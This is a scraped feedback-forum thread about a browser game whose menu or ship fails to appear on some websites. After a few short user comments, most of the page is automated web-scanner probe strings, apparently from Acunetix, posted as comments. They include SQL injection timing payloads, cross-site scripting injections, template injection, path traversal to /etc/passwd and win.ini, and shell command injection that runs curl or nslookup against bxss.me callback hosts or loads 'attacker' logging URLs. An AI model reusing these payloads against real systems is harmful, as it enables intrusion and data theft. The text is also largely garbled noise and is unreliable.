Feedback
Submit suggestionMenu not showing up by Patrick.Fletcher.118 - 154 months ago
i went on some sites and the menu or the ship im using doesnt show up
i went on some sites and the menu or the ship im using doesnt show up
520 agree
Unvote8065 agree
2858 agree
799 agree
772 agree
747 agree
746 agree
710 agree
682 agree
662 agree
661 agree
645 agree
633 agree
623 agree
622 agree
603 agree
592 agree
590 agree
579 agree
579 agree
573 agree
567 agree
565 agree
564 agree
564 agree
558 agree
553 agree
523 agree
522 agree
520 agree
511 agree
506 agree
498 agree
496 agree
493 agree
490 agree
488 agree
483 agree
479 agree
477 agree
470 agree
468 agree
465 agree
462 agree
461 agree
455 agree
455 agree
442 agree
434 agree
432 agree
420 agree
BeyPokéDig
This has happened to me on only one site so far: slovnik.cz. I hope it will help with finding out how the bug works.sitekillah1324
it happened to me on facebook, cant get the achevement :(Random person1
it happened to me on kickass sometimesRandom person1
*most of the timelxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1Dt0EBdKGSO1CixZapmxlO
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${10000216+9999481}Anonymous
1${9999029+9999740}
1WfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
file:///etc/passwdWfxYANoW
response.write(9083179*9435146)WfxYANoW
/etc/shellsWfxYANoW
'+response.write(9083179*9435146)+'WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
"+response.write(9083179*9435146)+"WfxYANoW
1WfxYANoW
c:/windows/win.iniresponse.write(9879116*9081915)
1WfxYANoW
../1WfxYANoW
bxss.me'+response.write(9879116*9081915)+'
1WfxYANoW
echo kjmtbv$()\ ngnscp\nz^xyu||a #' &echo kjmtbv$()\ ngnscp\nz^xyu||a #|" &echo kjmtbv$()\ ngnscp\nz^xyu||a #1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1"+response.write(9879116*9081915)+"
1WfxYANoW
&echo inekwu$()\ ezppvc\nz^xyu||a #' &echo inekwu$()\ ezppvc\nz^xyu||a #|" &echo inekwu$()\ ezppvc\nz^xyu||a #WfxYANoW
9wdJYFd3file:///etc/passwd
1WfxYANoW
cNg58uOU: bfg8KOa5Http://bxss.me/t/fit.txt
1bsbb26KT
1http://bxss.me/t/fit.txt?.jpg
1F812kInN: IHs3V46d
1/etc/shells
1WfxYANoW
1&n909078=v910630WfxYANoW
1WfxYANoW
1&echo yzxrga$()\ tsjkux\nz^xyu||a #' &echo yzxrga$()\ tsjkux\nz^xyu||a #|" &echo yzxrga$()\ tsjkux\nz^xyu||a #UTM4RFpqSkU=
1WfxYANoW
|echo suwjnq$()\ qrproe\nz^xyu||a #' |echo suwjnq$()\ qrproe\nz^xyu||a #|" |echo suwjnq$()\ qrproe\nz^xyu||a #WfxYANoW
)c:/windows/win.ini
1WfxYANoW
1|echo tffpyt$()\ yuoqgt\nz^xyu||a #' |echo tffpyt$()\ yuoqgt\nz^xyu||a #|" |echo tffpyt$()\ yuoqgt\nz^xyu||a #../WfxYANoW
1bxss.me
1WfxYANoW
1WfxYANoW
(nslookup -q=cname hitdkarypcubv3259c.bxss.me||curl hitdkarypcubv3259c.bxss.me))WfxYANoW
'.gethostbyname(lc('hitdj'.'uifpvravcc390.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(77).chr(106).chr(81).'WfxYANoW
!(()&&!|*|*|WfxYANoW
1WfxYANoW
$(nslookup -q=cname hityspduuqyzr96140.bxss.me||curl hityspduuqyzr96140.bxss.me)WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
".gethostbyname(lc("hitgy"."ichjozgsbf0c6.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(82).chr(105).chr(70)."WfxYANoW&n909659=v994953
1WfxYANoW
&nslookup -q=cname hitjpkpequigm8f6be.bxss.me&'\"`0&nslookup -q=cname hitjpkpequigm8f6be.bxss.me&`'WfxYANoW
';print(md5(31337));$a='WfxYANoW
^(#$!@#$)(()))******WfxYANoW
&(nslookup -q=cname hittaxyucwquz02a81.bxss.me||curl hittaxyucwquz02a81.bxss.me)&'\"`0&(nslookup -q=cname hittaxyucwquz02a81.bxss.me||curl hittaxyucwquz02a81.bxss.me)&`'WfxYANoW
gethostbyname(lc('hitqg'.'nqozzeel5d5ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(106).chr(86)WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
";print(md5(31337));$a="WfxYANoW
|(nslookup -q=cname hitkroaqbujtz6dc03.bxss.me||curl hitkroaqbujtz6dc03.bxss.me))
1!(()&&!|*|*|
1WfxYANoW
'"()^(#$!@#$)(()))******
1WfxYANoW
xfs.bxss.meWfxYANoW
'"WfxYANoW
${@print(md5(31337))}WfxYANoW
`(nslookup -q=cname hitorjwawtxlu1c949.bxss.me||curl hitorjwawtxlu1c949.bxss.me)`xfs.bxss.me
1WfxYANoW
<!--WfxYANoW
1'"()&%<zzz><ScRiPt >rvjB(9068)</ScRiPt>'"
1WfxYANoW
;(nslookup -q=cname hitaspuoewhcb1bf91.bxss.me||curl hitaspuoewhcb1bf91.bxss.me)|(nslookup -q=cname hitaspuoewhcb1bf91.bxss.me||curl hitaspuoewhcb1bf91.bxss.me)&(nslookup -q=cname hitaspuoewhcb1bf91.bxss.me||curl hitaspuoewhcb1bf91.bxss.me)<!--
1WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
1'&&sleep(27*1000)*dhfpne&&'WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(100).concat(79).concat(101).concat(86)+(require"socket" Socket.gethostbyname("hitkw"+"xbiolpeld55fe.bxss.me.")[3].to_s)+"WfxYANoW
1"&&sleep(27*1000)*kbwzge&&"WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
'"()&%<zzz><ScRiPt >rvjB(9876)</ScRiPt>HttP://bxss.me/t/xss.html?%00
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitglgjasxhem1ef42.bxss.me||curl${IFS}hitglgjasxhem1ef42.bxss.me)WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hiteqdfizkanxce5a2.bxss.me||curl${IFS}hiteqdfizkanxce5a2.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hiteqdfizkanxce5a2.bxss.me||curl${IFS}hiteqdfizkanxce5a2.bxss.me)&`'WfxYANoW
1'||sleep(27*1000)*lbedti||'WfxYANoW
commentWfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(113).concat(72).concat(118).concat(86)+(require'socket' Socket.gethostbyname('hitiq'+'ievxbusq2ad18.bxss.me.')[3].to_s)+'WfxYANoW
19700027WfxYANoW
1"||sleep(27*1000)*bzbbos||"bxss.me/t/xss.html?%00
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(117).concat(65).concat(116).concat(89)+(require'socket' Socket.gethostbyname('hitrj'+'mkvxkdieee4ff.bxss.me.')[3].to_s)WfxYANoW
comment�WfxYANoW
${@print(md5(31337))}\WfxYANoW
comment/.WfxYANoW
1WfxYANoW
'.print(md5(31337)).''"()
1comment
1WfxYANoW'&&sleep(27*1000)*osrxix&&'
1WfxYANoW
bfg1519<s1﹥s2ʺs3ʹhjl1519';print(md5(31337));$a='
1comment�
1comment/.
1";print(md5(31337));$a="
1WfxYANoW"&&sleep(27*1000)*idejlq&&"
1WfxYANoW'||sleep(27*1000)*oglyby||'
1${@print(md5(31337))}
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW"||sleep(27*1000)*mzfhyv||"
1${@print(md5(31337))}\
1'.print(md5(31337)).'
1WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
1WfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >rvjB(9199)</ScRiPt>WfxYANoW
1<WCZJ3H>KJEVB[!+!]</WCZJ3H>WfxYANoW
1<script>rvjB(9570)</script>WfxYANoW
1<script>rvjB(9784)</script>9784WfxYANoW
1<ScR<ScRiPt>IpT>rvjB(9777)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >rvjB(9238)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9752></ScRiPt>WfxYANoW
1<�ScRiPt >rvjB(9364)</ScRiPt>WfxYANoW
1RByGfGrvWfxYANoW
1<isindex type=image src=1 onerror=rvjB(9795)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9421'>WfxYANoW
1<body onload=rvjB(9451)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=rvjB(9819)>WfxYANoW
1<img src=xyz OnErRor=rvjB(9058)>WfxYANoW
1<img/src=">" onerror=alert(9949)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%72%76%6A%42%289703%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\rvjB(9009)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>rvjB(9831)</sCripT>WfxYANoW
1<input autofocus onfocus=rvjB(9684)>WfxYANoW
1WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
-1 OR 2+712-712-1=0+0+0+1 --WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(rvjB(9526))}WfxYANoW
-1 OR 2+86-86-1=0+0+0+1WfxYANoW
-1' OR 2+260-260-1=0+0+0+1 --WfxYANoW
1PDFqa <ScRiPt >rvjB(9529)</ScRiPt>WfxYANoW
-1' OR 2+782-782-1=0+0+0+1 or 'FjP5OtUS'='WfxYANoW
1<WKD4RA>O3ZLY[!+!]</WKD4RA>WfxYANoW
-1" OR 2+104-104-1=0+0+0+1 --WfxYANoW
1<ifRAme sRc=9790.com></IfRamE>WfxYANoW
1<afj4p8Z x=9098>WfxYANoW
1<img sRc='http://attacker-9354/log.php?WfxYANoW
1<afo0n0B<WfxYANoW'"()&%<zzz><ScRiPt >rvjB(9241)</ScRiPt>
1'"()&%<zzz><ScRiPt >rvjB(9867)</ScRiPt>
1WfxYANoW9758290
1bfg1021<s1﹥s2ʺs3ʹhjl1021
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >rvjB(9352)</ScRiPt>
1WfxYANoW<WOUGJM>KZIS4[!+!]</WOUGJM>
1WfxYANoW<script>rvjB(9762)</script>
1WfxYANoW<script>rvjB(9622)</script>9622
1WfxYANoW<ScRiPt >rvjB(9284)</ScRiPt>
1WfxYANoW<�ScRiPt >rvjB(9931)</ScRiPt>
1WfxYANoW<body onload=rvjB(9444)>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<img src=xyz OnErRor=rvjB(9789)>
1WfxYANoW<img/src=">" onerror=alert(9006)>
1WfxYANoW\u003CScRiPt\rvjB(9648)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>rvjB(9776)</sCripT>
1WfxYANoW<input autofocus onfocus=rvjB(9524)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(rvjB(9557))}
1WfxYANoWo58QX <ScRiPt >rvjB(9121)</ScRiPt>
1WfxYANoW<WB4LIJ>K0KOO[!+!]</WB4LIJ>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW<ifRAme sRc=9707.com></IfRamE>
1WfxYANoW<adh2As6 x=9251>
1WfxYANoW<img sRc='http://attacker-9023/log.php?
1WfxYANoW<aVb3jDG<
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1cQgQgev4'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 643=(SELECT 643 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 971=(SELECT 971 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 962=(SELECT 962 FROM PG_SLEEP(15))--WfxYANoW
1Vi5QMVIM' OR 519=(SELECT 519 FROM PG_SLEEP(15))--WfxYANoW
1s5zx5kiu') OR 267=(SELECT 267 FROM PG_SLEEP(15))--WfxYANoW
1RQTXCMVd')) OR 200=(SELECT 200 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@poxOvWfxYANoW
1WfxYANoW
1WfxYANoWeFVKJPM0
1WfxYANoW
1-1 OR 2+229-229-1=0+0+0+1 --
1-1 OR 2+735-735-1=0+0+0+1
1-1' OR 2+132-132-1=0+0+0+1 --
1-1' OR 2+958-958-1=0+0+0+1 or 'M3QjQ5Yo'='
1-1" OR 2+266-266-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWBfPHEWZC'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@Do5f2
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comgwkjwsuv
1klaaemyv
response.write(9810084*9576824)klaaemyv
'+response.write(9810084*9576824)+'mgcmrecb
1klaaemyv
"+response.write(9810084*9576824)+"mgcmrecb
1response.write(9025225*9064114)
1ysjeqhpk
set|set&setxduxxjkl
BtRkuDoWmgcmrecb
rXhwL6w0'+response.write(9025225*9064114)+'
1ysjeqhpk
$(nslookup 5KZZ0w7y)JO9I1San
1upblkjww
../../../../../../../../../../etc/passwdmgcmrecb
-1 OR 2+561-561-1=0+0+0+1 --"+response.write(9025225*9064114)+"
1ysjeqhpk
&nslookup R1VLRIkH&'\"`0&nslookup R1VLRIkH&`'cvbenjkx
1upblkjww
../../../../../../../../../../../../../../../proc/versionmgcmrecb
-1 OR 2+529-529-1=0+0+0+1kkhynefp
${9999698+9999268}set|set&set
1upblkjww
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgmgcmrecb
-1' OR 2+889-889-1=0+0+0+1 --${9999568+9999024}
1rritcmte
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg$(nslookup ucjH277D)
1upblkjww
../../../../../../../../../../etc/passwd�.jpgmgcmrecb
-1' OR 2+901-901-1=0+0+0+1 or 'CL5ktRyf'='OXdub3ZFMkk=
1rritcmte
1some_inexistent_file_with_long_name�.jpg&nslookup XIocqIxA&'\"`0&nslookup XIocqIxA&`'
1upblkjww
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgmgcmrecb
-1" OR 2+814-814-1=0+0+0+1 --rclmchyx
1&n970620=v956181rritcmte
Http://testasp.vulnweb.com/t/fit.txtftlqibps
)upblkjww
/../..//../..//../..//../..//../..//etc/passwd�.jpgmgcmrecb
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/cvbenjkx
1rritcmte
http://testasp.vulnweb.com/t/fit.txt?.jpgftlqibps
!(()&&!|*|*|upblkjww
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdmgcmrecb
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/Anonymous
1bgvqiynb&n960027=v917731
1rritcmte
testasp.vulnweb.comftlqibps
^(#$!@#$)(()))******upblkjww
/etc/passwdmgcmrecb
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/)
1upblkjww
%2fetc%2fpasswdmgcmrecb
(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/1some_inexistent_file_with_long_name�.jpg
1!(()&&!|*|*|
1upblkjww
/.././.././.././.././.././.././.././../etc/./passwd%00mgcmrecb
-1; waitfor delay '0:0:3' --ottrwxlk
;print(md5(acunetix_wvs_security_test));tlleqpvs
'"()Http://testasp.vulnweb.com/t/fit.txt
1^(#$!@#$)(()))******
1uqsoelyu
http://testasp.vulnweb.com/t/xss.html?%00.jpgupblkjww
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdmgcmrecb
-1; waitfor delay '0:0:10' --ottrwxlk
';print(md5(acunetix_wvs_security_test));$a='http://testasp.vulnweb.com/t/fit.txt?.jpg
1ornvyauq
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
1upblkjww
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdmgcmrecb
-1); waitfor delay '0:0:3' --ottrwxlk
";print(md5(acunetix_wvs_security_test));$a="'"()
1testasp.vulnweb.com
1ornvyauq
commentgxmrlmnf
http://hitqYQhoVgKee.bxss.me/mgcmrecb
-1); waitfor delay '0:0:10' --ottrwxlk
${@print(md5(acunetix_wvs_security_test))}btcryxyl
1kdgkwqiy
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))ornvyauq
comment�http://hitUiHSgbfVl3.bxss.me/
1mgcmrecb
1 waitfor delay '0:0:7' --upblkjww
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.ottrwxlk
${@print(md5(acunetix_wvs_security_test))}\btcryxyl
1'"ornvyauq
comment/.pxdeflju
/www.vulnweb.commgcmrecb
407g5yMZ'; waitfor delay '0:0:7' --upblkjww
file:///etc/passwd;print(md5(acunetix_wvs_security_test));
1btcryxyl
\ornvyauq
1veosywep
'"/www.vulnweb.com
1mgcmrecb
-1;select pg_sleep(7); --upblkjww
/\../\../\../\../\../\../\../etc/passwd';print(md5(acunetix_wvs_security_test));$a='
1comment
1veosywep
<!--qsejaslp
1'"()&%<acx><ScRiPt >CcIY(9829)</ScRiPt>mgcmrecb
-1);select pg_sleep(7); --upblkjww
WEB-INF/web.xml";print(md5(acunetix_wvs_security_test));$a="
1btcryxyl
@@aWG3Hcomment�
1'"
1mgcmrecb
-1));select pg_sleep(10); --upblkjww
/WEB-INF/web.xml${@print(md5(acunetix_wvs_security_test))}
1btcryxyl
JyI=comment/.
1<!--
1qsejaslp
'"()&%<acx><ScRiPt >CcIY(9932)</ScRiPt>mgcmrecb
AS3UYMPG';select pg_sleep(10); --upblkjww
WEB-INF\web.xml${@print(md5(acunetix_wvs_security_test))}\
1mgcmrecb
gkNxxywg');select pg_sleep(3); --../../../../../../../../../../etc/passwd
1qsejaslp
1_9173mgcmrecb
0Dk7JgLS');select pg_sleep(0); --btcryxyl
(select convert(int,CHAR(65)))mgcmrecb
6wbLzv7B'));select pg_sleep(3); --btcryxyl
1qsejaslp
acu2148<s1﹥s2ʺs3ʹuca2148mgcmrecb
LE0583B0'));select pg_sleep(7); --1'"
1../../../../../../../../../../etc/passwd�.jpg
1mgcmrecb
1\
1mgcmrecb
1FhOj7iwn
1@@GG4YK
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1qsejaslp
{{10000343*9999131}}-1 OR 2+865-865-1=0+0+0+1 --
1JyI=
1/etc/passwd
1-1 OR 2+629-629-1=0+0+0+1
1%2fetc%2fpasswd
1qsejaslp
1<ScRiPt >CcIY(9621)</ScRiPt>-1' OR 2+327-327-1=0+0+0+1 --
1-1' OR 2+456-456-1=0+0+0+1 or 'DN4cahdw'='
1(select convert(int,CHAR(65)))
1qsejaslp
1<WZMLJQ>78DD7[!+!]</WZMLJQ>-1" OR 2+13-13-1=0+0+0+1 --
1qsejaslp
1<script>CcIY(9939)</script>1 waitfor delay '0:0:13' --
1file:///etc/passwd
1qsejaslp
1<ScR<ScRiPt>IpT>CcIY(9503)</sCr<ScRiPt>IpT>ju1qe5F0'; waitfor delay '0:0:13' --
1/\../\../\../\../\../\../\../etc/passwd
1AHyoAbDA';select pg_sleep(4); --
1WEB-INF/web.xml
1qsejaslp
1<ScRiPt >CcIY(9707)</ScRiPt>Zf8TKr9E');select pg_sleep(4); --
1/WEB-INF/web.xml
1bLpNGeT4'));select pg_sleep(4); --
1WEB-INF\web.xml
1qsejaslp
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9018></ScRiPt>qsejaslp
1<�ScRiPt >CcIY(9120)</ScRiPt>qsejaslp
1<video><source onerror="javascript:CcIY(9190)">qsejaslp
1<isindex type=image src=1 onerror=CcIY(9316)>qsejaslp
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9178'>qsejaslp
1<body onload=CcIY(9355)>qsejaslp
1<img src=//testasp.vulnweb.com/t/dot.gif onload=CcIY(9168)>qsejaslp
1<img src=xyz OnErRor=CcIY(9726)>qsejaslp
1<img/src=">" onerror=alert(9477)>qsejaslp
%31%3C%53%63%52%69%50%74%20%3E%43%63%49%59%289387%29%3C%2F%73%43%72%69%70%54%3Eqsejaslp
1\u003CScRiPt\CcIY(9234)\u003C/sCripT\u003Eqsejaslp
1<ScRiPt>CcIY(9900)</sCripT>qsejaslp
1<input autofocus onfocus=CcIY(9296)>qsejaslp
<a HrEF=http://www.vulnweb.com></a>qsejaslp
<a HrEF=jaVaScRiPT:>qsejaslp
[url=http://www.vulnweb.com][/url]qsejaslp
1<img<!-- --> src=x onerror=alert(9297);//><!-- -->qsejaslp
1}body{acu:Expre/**/SSion(CcIY(9501))}qsejaslp
1<% contenteditable onresize=CcIY(9583)>qsejaslp
1_7DaQv <ScRiPt >CcIY(9708)</ScRiPt>qsejaslp
1<WGIY9A>JVE4V[!+!]</WGIY9A>qsejaslp
1<ifRAme sRc=9250.com></IfRamE>qsejaslp
1<C5kQPC x=9028>qsejaslp
1<img sRc='http://attacker-9584/log.php?qsejaslp'"()&%<acx><ScRiPt >CcIY(9118)</ScRiPt>
1'"()&%<acx><ScRiPt >CcIY(9143)</ScRiPt>
1qsejaslp_9905
1acu3671<s1﹥s2ʺs3ʹuca3671
1{{9999014*10000249}}
1qsejaslp<ScRiPt >CcIY(9250)</ScRiPt>
1qsejaslp<WBB6EO>TP534[!+!]</WBB6EO>
1qsejaslp<script>CcIY(9029)</script>
1qsejaslp<ScRiPt >CcIY(9580)</ScRiPt>
1qsejaslp<�ScRiPt >CcIY(9782)</ScRiPt>
1qsejaslp<body onload=CcIY(9428)>
1qsejaslp<img src=xyz OnErRor=CcIY(9276)>
1qsejaslp<img/src=">" onerror=alert(9758)>
1qsejaslp\u003CScRiPt\CcIY(9943)\u003C/sCripT\u003E
1qsejaslp<ScRiPt>CcIY(9594)</sCripT>
1qsejaslp<input autofocus onfocus=CcIY(9689)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1qsejaslp}body{acu:Expre/**/SSion(CcIY(9720))}
1qsejaslp<% contenteditable onresize=CcIY(9635)>
1qsejaslp_JRtNx <ScRiPt >CcIY(9746)</ScRiPt>
1qsejaslp<W5OJUP>V3G9F[!+!]</W5OJUP>
1qsejaslp<ifRAme sRc=9497.com></IfRamE>
1qsejaslp<tOmmni x=9027>
1qsejaslp<img sRc='http://attacker-9981/log.php?
1aidene
not working at all for meComment